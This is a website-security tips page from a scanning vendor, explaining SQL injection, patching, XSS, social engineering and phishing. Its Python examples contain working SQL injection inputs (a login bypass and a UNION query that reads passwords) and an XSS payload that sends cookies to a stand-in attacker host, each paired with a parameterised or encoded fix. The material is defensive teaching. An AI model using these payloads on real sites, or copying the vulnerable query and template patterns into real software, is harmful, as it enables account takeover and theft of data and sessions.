WebSafe Shield
Security Tips

 

Introduction

Protecting your website and your customers' sensitive information involves many different layers: the servers' operating systems, the applications running on those servers, employees, access controls, management support, and so on.

In a world where protecting systems (and the information they hold) is a constantly evolving effort, and the challenges multiply as financially motivated attackers join the hobbyists, constant due diligence is required. You may "do everything right" and your system may be "secure" against known vulnerabilities, but situations change, and if you're not careful your system can easily become exposed to malicious activity.

The following is by no means an exhaustive list. It is meant to explain some of the more common attack methods employed today, and to help you and your company start taking a broader approach to website security.

SQL Injection

SQL Injection is one of the most pervasive security vulnerabilities on the web today. It takes advantage of application code that builds database queries by pasting user-supplied input directly into the SQL text (dynamic queries assembled by string concatenation, and stored procedures that do the same thing internally), so that input meant to be data is interpreted as part of the command.

This method allows the attacker to create, read, update, or delete any data the application's database account can reach. The most serious scenario is when the attacker uses the database to compromise the database server itself and the services associated with it.
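The following is an added example, not code from the original page or from WebSafe Shield, showing the mechanism described above in Python against an in-memory SQLite database. The user table, the two accounts, and the login and search functions are all constructed for this illustration (hypothetical names, not any real application). The vulnerable versions paste the form fields into the SQL text; the safe versions pass them as query parameters, so the same attacker input stays data.

```python
import sqlite3

# Constructed sample data for this example (no real accounts). Passwords are
# kept in clear text only to keep the demonstration short; a real site stores
# salted password hashes.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory SQLite database holding the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Hypothetical login check that pastes the form fields into the SQL text.

    Whatever the user types becomes part of the command, so a quote and a
    comment marker in the username discard the password check entirely.
    """
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The same check as a parameterised query: the input is bound as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term):
    """Hypothetical user search built by concatenation. A UNION in the term
    lets the attacker read any column the database account can see, here the
    password column, through a query that was only meant to list usernames."""
    sql = "SELECT username FROM users WHERE username LIKE '%%%s%%'" % term
    return {row[0] for row in conn.execute(sql).fetchall()}


def search_safe(conn, term):
    """Parameterised search: the wildcards are added to the value, not the SQL."""
    sql = "SELECT username FROM users WHERE username LIKE ?"
    return {row[0] for row in conn.execute(sql, ("%" + term + "%",)).fetchall()}


# Attacker-supplied inputs (constructed for the example).
BYPASS_USERNAME = "alice' --"   # closes the quote, then comments out the rest
UNION_TERM = "' UNION SELECT password FROM users --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with alice' -- :", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("safe login with the same input  :", login_safe(db, BYPASS_USERNAME, "wrong"))
    print("vulnerable search leaks         :", search_vulnerable(db, UNION_TERM))
    print("safe search returns             :", search_safe(db, UNION_TERM))
```

Run as a script, the vulnerable login accepts `alice' --` with any password and the vulnerable search returns the password column alongside the usernames, while both parameterised versions treat the same strings as literal text and match nothing. Parameterised queries (prepared statements) are the fix; escaping quotes by hand is a weaker substitute that is easy to get wrong.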

Software Not Kept Up-to-Date

There tend to be three reasons why software is not kept up-to-date:

1. Lack of Awareness: Despite all the discussion around web security, and how simply keeping software up-to-date would make a significant difference in keeping your site secure, this is still not as widely acknowledged as it should be.

2. Not a priority: Closely related to the reason above, when maintaining a secure website is not a clear corporate priority, it often takes a backseat to other activities.

3. Compatibility with Other Software: Depending on the number of different applications in use, a website owner may need to apply a multitude of different updates. It is commonly accepted practice that before any upgrade is applied, thorough testing is required to ensure compatibility. With this important QA process in place, it's easy to sympathize with any website owner who has to deal with this situation. However, ensuring the website has the latest upgrades, especially those patching critical security flaws, can save the website owner time, effort and grief in the long run.

Cross-Site Scripting (XSS)

Cross-site scripting, also known as XSS, is another common security vulnerability.

XSS allows websites to be defaced, malicious code to be added to pages, and phishing attempts to be supported, among other issues.

Essentially, a malicious person uses this method to get a script of their choosing delivered to an unsuspecting user as part of a page from a site the user trusts, because the site echoes user-supplied input (a comment, a search term, a URL parameter) into its pages without encoding it. The recipient's browser cannot distinguish the attacker's script from the site's own, so it executes the script with that site's privileges. The script can access any cookies, session tokens, or other sensitive information retained by the browser for that site, and it can also change the content of the pages the user sees.
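As an added example, not part of the original page or of WebSafe Shield's code, the following Python shows the server-side half of the problem and its fix: a hypothetical comment template that drops stored input into the page unchanged, beside the same template with HTML output encoding. The cookie-stealing payload and the attacker host `attacker.example` are constructed for the illustration. It also covers the attribute-context case the text does not spell out: escaping alone does not neutralise a `javascript:` URL placed in an `href`, so links need a scheme check as well.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input: a comment body that, if rendered as markup,
# ships the visitor's cookies to a hypothetical attacker-controlled host.
XSS_PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
               "+document.cookie</script>")
# Constructed attacker input for a link field: html.escape leaves this intact.
JS_URL = "javascript:alert(document.cookie)"


def render_comment_vulnerable(author, body):
    """Hypothetical template that inserts stored user input into the page as-is.
    The browser cannot tell the attacker's <script> from the site's own."""
    return '<p class="comment"><b>%s</b>: %s</p>' % (author, body)


def render_comment_safe(author, body):
    """Same template with HTML output encoding: < > & " ' become entities, so
    the payload is displayed as text instead of being executed."""
    return '<p class="comment"><b>%s</b>: %s</p>' % (
        html.escape(author, quote=True), html.escape(body, quote=True))


def safe_href(url):
    """Attribute context needs more than escaping. A javascript: URL contains
    nothing html.escape would touch, so only http(s) links are allowed through,
    and those are still encoded for the attribute."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link(url, text):
    """Render a user-supplied link with both the scheme check and encoding."""
    return '<a href="%s">%s</a>' % (safe_href(url), html.escape(text, quote=True))


if __name__ == "__main__":
    print(render_comment_vulnerable("eve", XSS_PAYLOAD))
    print(render_comment_safe("eve", XSS_PAYLOAD))
    print(render_link(JS_URL, "click me"))
    print(render_link("http://example.com/?a=1&b=2", "normal link"))
```

The encoding has to match the context the data lands in (HTML body, attribute value, URL, or script); `html.escape` covers the first two here. Marking session cookies `HttpOnly` is a worthwhile complement, since it keeps scripts from reading them, but it does not stop the injected script from acting within the page, so output encoding remains the primary fix.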

Social Engineering

This is a little different from the vulnerabilities above, in that it focuses on people rather than on specific flaws in specific pieces of software.

It's all too seldom that this collection of security weaknesses is discussed alongside the technical ones. It's quite well known in the retail industry that most theft comes from employees, not from shoppers or professional thieves. While we don't suggest anyone's employees are particularly deceptive, it's unfortunate that this isn't discussed more often. One reason is that companies, quite understandably, often choose to deal with these matters quietly.

On a more positive note, training and documented procedures can certainly help ensure that basic, yet very important, processes are observed.

Another type of social engineering involves gaining the trust of employees. A recent article on social engineering pointed to a successful method. A CEO was traveling to a seminar where they were to deliver a keynote speech; of course this information was published and widely known. A malicious attacker called the company a few minutes before the presentation, stated that they were helping the CEO prepare for the meeting but needed access to the network, and the employees, wanting to help their CEO at a critical moment, immediately gave the attacker the requested information.

It's important to understand the various ways social engineering takes place, and to educate your team to disclose information only to people whose identity they have confirmed, for example by calling back on a number already on file rather than trusting the caller's own account of who they are.

Phishing

Phishing is when someone sets up a website designed to look like another website. eBay is a very well known target of very frequent phishing attempts. Malicious attackers set up a website that looks exactly like the target site (early phishing attempts were more amateurish, but they have since evolved into some very authentic-looking sites) and lure users, typically by e-mail, into "signing in". Once the user "signs in", which hands the username and password to the attacker, the attacker is able to access the user's real account.

Phishing is a little different from the other attacks in that the website owner has little practical ability to stop the copy from being built, since it lives on infrastructure the attacker controls. Organizations have been formed to identify, and readily disseminate information on, sites being used to conduct phishing attacks, so that browsers, mail filters and hosting providers can block or take them down.

Summary

The number of methods for gaining access is limited only by human imagination, and there are clearly some very imaginative people with the skill and the desire to test your site's defenses.

Engaging a remote security scanning service is one of the key tools a website owner needs in order to ensure a secure environment for their customers.

Copyright 2007 - 2008, Armadillo Advantage, LLC - WebSafe Shield®